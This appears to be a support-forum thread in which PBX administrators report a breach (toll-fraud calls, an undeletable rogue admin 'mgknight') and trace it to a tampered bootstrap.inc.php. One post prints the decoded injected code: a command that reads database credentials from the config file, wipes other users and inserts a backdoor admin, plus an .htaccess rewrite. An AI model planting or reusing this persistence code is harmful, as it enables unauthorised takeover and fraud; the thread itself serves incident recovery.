Just yesterday I upgraded ALL the modules in this system. We got a message from the SIP trunk provider that we were making calls to Liberia. I tried to log into the system and could not. I used the amportal admin auth_none command and I can get into the system that way. I have tried to delete the new admin user he created but it will not go away. I have changed the Authorization to Database in Advanced Settings, still with no way of creating or removing the new admin user. There is a new extension listed in SIP info that is unmonitored, but it isn’t listed in the extension listings. There are outbound calls from unknown for several seconds. I tried remove extension command in the Asterisk CLI but I got an error that that command wasn’t valid.
If you still cant delete please open a support request so we can take care of it for you. This is fixed when you update all modules and you wouldn’t have been hacked if you updated modules 12 days ago when the CVE was released.
Still cannot delete the user. I uninstalled the Framework ARI module and reinstalled it. I also checked for an update, none shown. The version reported is 2.11.1.5 I am being asked by my partner if the cost per hour is $150.00 and if it can be resolved in an hour or less.
Well, I found the method to upgrade framework using the CLI. It appeared to install/upgrade alright. But the problem remains and the version of Framework remains the same.
I was also having the same issue as edlentz where I had a new administrator named mgknight which I couldn’t delete. I followed the instructions provided by tm1000 in another thread for removing it with a mysql command, and then issued a SELECT command to verify it was in fact deleted. But as soon as I opened any page on in the administration interface, the user showed back up.
I found that /var/www/html/admin/bootstrap.inc.php had been modified to include code which re-created the user account any time a page was loaded. As soon as I removed the code from that file, I could delete the user account normally.
Here is the source of the modified bootstrap.inc.php file
The first base64_decode incldues the following code:
mysql grep AMPDB /etc/amportal.conf|grep "USER\|PASS\|NAME"| sed 's/AMPDBUSER/a/g'|sed 's/AMPDBPASS/b/g'|sed 's/AMPDBNAME/c/g'|sed 's/a=/-u/g'|sed 's/b=/ -p/g'|sed 's/c=/ /g'|tr -d '\n' --execute “DELETE from ampusers where username!=‘admin’;INSERT INTO ampusers (username,password_sha1,sections) VALUES (‘mgknight’,‘33c7a4df46b1a9f7d4a4636d476849205a04c6b7’,‘*’);”
Which appears to simply delete any users which are not “admin” and then creates the new “mgknight” admin account.
The second base64_decode incldues the following code:
echo ‘Order Deny,Allowdeny from all<Files subdirectory/*> deny from all<FilesMatch "\..*$"> Deny from all</FilesMatch><FilesMatch “(^$|index.php|config.php|.(gif|GIF|jpg|jpeg|png|css|js|swf|txt|ico|ttf|svg|eot|woff|wav|mp3|aac|ogg|webm)$|bootstrap.inc.php)”> Allow from allphp_value max_input_vars 5000'|tr '’ ‘\n’>.htaccess
I’m not entirely sure what this command does. If anyone can offer any insight on if there is anything else that should be recovered from the above commands, please be sure to reply!
I’m having same issue as edlentz and I also found the creating user code in the bootstrap.inc.php as jcremin noted.
But even though I removed the code, it comes back.
I have updated all the modules but still having same problem.
Does anyone know how to fix this?
I ran and update went through. Immediately following I received an error due to no bootstrap.inc.php file. I created a blank file and that appeared to fix. but is there any contents that should go in that file?
